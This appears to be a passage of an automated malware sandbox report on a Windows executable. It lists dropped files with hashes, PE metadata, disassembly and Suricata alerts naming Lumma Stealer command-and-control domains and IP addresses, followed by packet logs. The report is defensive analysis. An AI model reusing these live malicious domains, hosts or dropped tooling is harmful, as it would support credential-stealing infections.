Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Windows\Speech\imxyvi.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	233472
Entropy (8bit):	6.342628803287784
Encrypted:	false
SSDEEP:	3072:fQCyKBU+DkgSZxPOs82L7a3Mum6kJfADWPlA8lxPMvt6L1Hke0tjwKswX:fQCYtj9FAiNA8l2V6lkeCjwKs
MD5:	6E90C863F1166A43E590204D055EE08A
SHA1:	C02E42892470124601B5B1126B2C780BB0F2C502
SHA-256:	54ABE3EF576221E0D1341371378F36E9F63E3F5576069573910FCAD5CF43B24F
SHA-512:	14A38A5B20B4972956349D4718B9A6ED8286C46C3758A28ACC382B369B38DBC67F2D9019A95C26430E1D3C77088AD47AF0EA96853E56ECCB3FDAFE36F289665C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...k.l.p...l..f...l..h...l..C...l..d...)...i...b...y...qk..c...qk..c...qk..c...Richb...................PE..d...X..f.........."....(............H..........@..........................................`..................................................O..h...............H...............4.......p...............................@............... ............................text...o........................... ..`.rdata.. ...........................@..@.data....>...........d..............@....pdata..H............p..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................

C:\Windows\Speech\kdmapper.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2284739
Entropy (8bit):	7.490456730492454
Encrypted:	false
SSDEEP:	24576:2TbBv5rUyXVRCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKY:IBJ1LLvax4Gmhscse1D
MD5:	C85ABE0E8C3C4D4C5044AEF6422B8218
SHA1:	F9A4DACEBF1DD80F54DA8C8AFE1DEDDAC99D381D
SHA-256:	7C388F4215D04EEA63A7D5BD9F3CADE715F285EA72DE0E43192FC9F34BAF7C52
SHA-512:	082F4924C624D9B35DFF185B582278E032D3FF230E48739D796BBA250B0807C498EF1B52F78B864AADB35DB0F65463035110C02B7D92DE4FB0A86902CCAD7CB5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Windows\Speech\physmeme.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	370176
Entropy (8bit):	7.990824056166435
Encrypted:	true
SSDEEP:	6144:uFEE0IJwfawOmaDOEFI2FSCsPOjygLxkxweCyxORzX7rIh0uUWJZtwCiDMf+egqx:uFElvH+KEFLSvVAL7rqDtAIfiq4
MD5:	D6EDF37D68DA356237AE14270B3C7A1A
SHA1:	37FCDB2A0FB6949E710A7E64E181993FD4CBCB29
SHA-256:	D5F6F3242C601E85EEDFF04CD45947F7890E908E51C57F90521EED59C8088B4B
SHA-512:	01CE470A7D19FB9E139C038FF5DD30B6D85409A87B298AE9D3106B5E2EF8712C0D7FC7E4587886DEE47DB040033B9D2D591A0CAFC0001461A0DC07338F0BAA21
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.f................................. ........@.. ....................................`.................................l...O...................................4................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p................................................................9m.[...{....V._A.._..X..[m.'..#Q.......[..+H.<..fZ..\|.....m&......y..;KR....7..S..k.m?.8..ID&.!0%N!\.\..L^...0\.....j\|.M.........M.;..q..UO..!'..%. d.E.u......Q-w.$I...X...0d......f.$\|(.gE.N...3.J..T.?.q..\.yX:..W6...t..d.......(.E..n..K.J050....=I3-.x.p.......&{#.,..Vxb.G\.=$...}.C.fgl..`.I.yZ..?.$.'J)....K..............TV.@,...r..q....+....2<ILOS....n<..o.T.~.d:... ..z.>...._.H...

C:\Windows\Speech\rtcore64.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	351232
Entropy (8bit):	7.880670586595911
Encrypted:	false
SSDEEP:	6144:AxSaRDycKASpgS6sdn3P7cS9ShRjReCl6zY5AOQ61oEY62XhT2+:AxLy2bzczcMSfjFOoU62XhT2+
MD5:	725EA12718261F13FB96AC192729A2A4
SHA1:	3B1B55ED462B4371B2CAA579C8ABBCC7C2809352
SHA-256:	0C9283378097DF2F44A2BB0A7A43826E531DCD97CBB5505B53E1847D6868B088
SHA-512:	9C90EC835F15CDAF9F7DB8D33EF1D062337384527BF9594387C6612C5ABEDDC9EDD4417A6B792523611AFF8CF76B82E06A60D006AD0BC14C13A3C606641630A7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................................... ....@.. ....................................@.....................................O.......0...............................................................................................H...........Z.hxHw+..... ......................@....text...0........................... ..`.rsrc...0............P..............@..@.reloc...............X..............@..B.....................Z.............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.295993221842788
Encrypted:	false
SSDEEP:	6144:241fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+JFmBMZJh1VjR:n1/YCW2AoQ0NijFwMHrVV
MD5:	97A9EDF90AB000801499F80F6F6D7711
SHA1:	C828F0DD37EC82CA495A411C93DCD80D7A8868EC
SHA-256:	90363B9290EDD2F56D183A2CDE46B0B3CDFAE10474792B4A30A7A7E61A7143E6
SHA-512:	412AA8575532E8F5DA82130EB86583240B5D44FCF7A5769E2B714C9570FA38F24B9259B4E53727B030A10503A78A58C5191C368895C19723BD796C98CA03BAF3
Malicious:	false
Reputation:	unknown
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...T...............................................................................................................................................................................................................................................................................................................................................,...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Speech\physmeme.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	2.5600289361122233
Encrypted:	false
SSDEEP:	3:oWEMo6vvRya:oWEpKvD
MD5:	198AA7622D86723F12D39AA38A10C97F
SHA1:	B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
SHA-256:	88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
SHA-512:	8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
Malicious:	false
Reputation:	unknown
Preview:	012340..1..2..3..4.....

\Device\Null

Download File

Process:	C:\Windows\System32\taskkill.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.565107840986821
Encrypted:	false
SSDEEP:	3:RLg9duHgkE0Id8KUe9y:RLg9duAJdOe9y
MD5:	8858CC3810613C64CBCE69191CA1CAAC
SHA1:	70EFBBD9D3E139E3958B3232BD7702551C05E1A3
SHA-256:	DEEF0F2AB50ED4267EF31B1C6D2D266DDC1D4F75D8B8BD8104D94ADA08B50485
SHA-512:	25DFD0713A9BA1D3A4CF820142248E971998BFDFC6852E3806F3170703AAFED485098C6DC50EBABA83130E8E7C01914E18D692C5096D95E9DF726190449D86F1
Malicious:	false
Reputation:	unknown
Preview:	ERROR: The process "EpicGamesLauncher.exe" not found...

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.2815970715940646
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	UY9hUZn4CQ.exe
File size:	101'888 bytes
MD5:	206addac1b15931a5a6f35222eced8c8
SHA1:	297f99ca521f8a6133c39ce32d4f6e096860a4b7
SHA256:	b1921e7e0377938146532a5abbd6dda82dff5008a94f921c40f0abf6844f9112
SHA512:	68586256c387891c637063143a13ff7c9aa81aba28f2f7519f272ee2c123d5d21f11f666324166403625226867ca7e93c58822fab6bc4308b98ae50179103879
SSDEEP:	1536:/AQQNQdlseZ1ffEaEWbAub1bGb6bBbzgEMbbE8bWB7zdWmLVz6o587DSfZYnd8m:4QQidl1Pp9Lp6887OCd8m
TLSH:	22A3B72ABCAB0A69DDA15DBC923C41CAF327D55D1F954BFB63D604682C029DC2FA1C13
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h....J...J...J...J...J...K...J...K...J...K...J...K...J...K...J...JI..J...K...J...J...J...K...JRich...J........PE..d....*.f...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x1400131f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F92A07 [Sun Sep 29 10:20:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5a71cd95736a46b01adfe7028b8fdffb

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F5B6C8F75A0h
dec eax
add esp, 28h
jmp 00007F5B6C8F6CC7h
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F5B6C8F6E62h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F5B6C8F6E65h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F5B6C8F6E5Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F5B6C8F67C6h
int3
retn 0000h
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [00001E3Bh]
dec eax
mov ecx, ebx
call dword ptr [00001E2Ah]
call dword ptr [00001E34h]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [00001E28h]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1830c	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c000	0x1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1b000	0x8a0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d000	0xb4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16700	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x165c0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x358	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1356f	0x13600	b415dcf6ddf0965a88c3e9fc56c2dd6e	False	0.3128780241935484	data	6.277764417859445	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x411a	0x4200	c4147349ee68a1e8d85e7e4557f302ff	False	0.44365530303030304	data	5.324411929678907	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x940	0x400	1b17e6ae6e44a5ebf9bf25c217c0cc86	False	0.2060546875	DOS executable (block device driver)	2.70418253102352	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1b000	0x8a0	0xa00	4001028a68167c3252366c4534aabe4c	False	0.43515625	data	4.469770979422141	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1c000	0x1e8	0x200	11076f4cd92501eb5cdceca592d7760f	False	0.541015625	data	4.7644199514493595	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1d000	0xb4	0x200	931a235e04d3184bfe6430d7dab45aca	False	0.3359375	data	2.386329255934609	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x1c060	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
KERNEL32.dll	SetConsoleTextAttribute, SetConsoleTitleA, GetStdHandle, Sleep, CreateThread, Beep, GetConsoleWindow, SetConsoleTitleW, FormatMessageA, GetLocaleInfoEx, CreateFileW, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, CloseHandle, GetLastError, GetModuleHandleW, GetFileInformationByHandleEx, MultiByteToWideChar, WideCharToMultiByte, GetCurrentThreadId, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, LocalFree
USER32.dll	FindWindowA, ShowWindow, GetAsyncKeyState
MSVCP140.dll	??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, _Query_perf_frequency, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Xout_of_range@std@@YAXPEBD@Z, ?_Winerror_map@std@@YAHH@Z, ?_Xlength_error@std@@YAXPEBD@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ?_Syserror_map@std@@YAPEBDH@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, _Query_perf_counter
VCRUNTIME140_1.dll	__CxxFrameHandler4
VCRUNTIME140.dll	__current_exception_context, __current_exception, memcmp, _CxxThrowException, __std_exception_copy, __std_exception_destroy, memcpy, __C_specific_handler, memset, __std_terminate, memmove
api-ms-win-crt-stdio-l1-1-0.dll	_set_fmode, __p__commode
api-ms-win-crt-heap-l1-1-0.dll	malloc, _set_new_mode, _callnewh, free
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-runtime-l1-1-0.dll	_get_initial_narrow_environment, _crt_atexit, _initterm, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, _seh_filter_exe, _initterm_e, exit, _exit, abort, __p___argc, _set_app_type, _invalid_parameter_noinfo_noreturn, __p___argv, _c_exit, system, terminate, _register_onexit_function, _register_thread_local_exe_atexit_callback, _cexit
api-ms-win-crt-locale-l1-1-0.dll	___lc_codepage_func, _configthreadlocale
SHELL32.dll	ShellExecuteW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T18:20:16.577439+0200	2056172	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)	1	192.168.2.10	62005	1.1.1.1	53	UDP
2024-09-30T18:20:16.717882+0200	2056054	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)	1	192.168.2.10	65184	1.1.1.1	53	UDP
2024-09-30T18:20:16.779440+0200	2056040	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)	1	192.168.2.10	49789	1.1.1.1	53	UDP
2024-09-30T18:20:16.795527+0200	2056056	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)	1	192.168.2.10	51044	1.1.1.1	53	UDP
2024-09-30T18:20:16.889040+0200	2056036	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)	1	192.168.2.10	62402	1.1.1.1	53	UDP
2024-09-30T18:20:16.933938+0200	2056058	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)	1	192.168.2.10	51291	1.1.1.1	53	UDP
2024-09-30T18:20:17.496230+0200	2056046	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)	1	192.168.2.10	58599	1.1.1.1	53	UDP
2024-09-30T18:20:17.525474+0200	2056042	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)	1	192.168.2.10	63652	1.1.1.1	53	UDP
2024-09-30T18:20:17.581169+0200	2056052	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)	1	192.168.2.10	49520	1.1.1.1	53	UDP
2024-09-30T18:20:20.683051+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.10	49719	172.67.197.40	443	TCP
2024-09-30T18:20:20.683051+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	49719	172.67.197.40	443	TCP
2024-09-30T18:20:24.575237+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.10	49726	188.114.96.3	443	TCP
2024-09-30T18:20:24.575237+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	49726	188.114.96.3	443	TCP
2024-09-30T18:20:25.990274+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.10	49728	104.21.1.169	443	TCP
2024-09-30T18:20:25.990274+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	49728	104.21.1.169	443	TCP
2024-09-30T18:20:28.638282+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.10	49733	172.67.197.40	443	TCP
2024-09-30T18:20:28.638282+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	49733	172.67.197.40	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:20:00.976337910 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:00.976381063 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:00.976438999 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.094594955 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.094626904 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.583569050 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.583687067 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.605937958 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.605964899 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.606434107 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.623099089 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.667397976 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.739964962 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.740006924 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.740036011 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.740060091 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.740067959 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.740087986 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.740117073 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.740127087 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.740578890 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.740618944 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.740628004 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.740658045 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.740664005 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.740669966 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.740710974 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.740885973 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.744781971 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.745183945 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:01.745197058 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:01.874531031 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.037817955 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.037878036 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.037904978 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.037928104 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.037935972 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.037967920 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.037977934 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038018942 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038026094 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.038033009 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038074017 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.038074970 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038088083 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038122892 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.038129091 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038184881 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038212061 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038233042 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.038239956 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038275957 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038316011 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.038321972 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038351059 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038367033 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.038373947 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038409948 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038445950 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038448095 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.038456917 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.038480043 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.189584017 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.189599991 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.317210913 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.317245960 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.317272902 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.317281008 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.317303896 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.317374945 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.317404032 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.317425966 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.317454100 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.317454100 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.317476034 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.317662001 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.317730904 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.317748070 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.317811012 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.317825079 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.318805933 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.318883896 CEST	49708	443	192.168.2.10	188.114.97.3
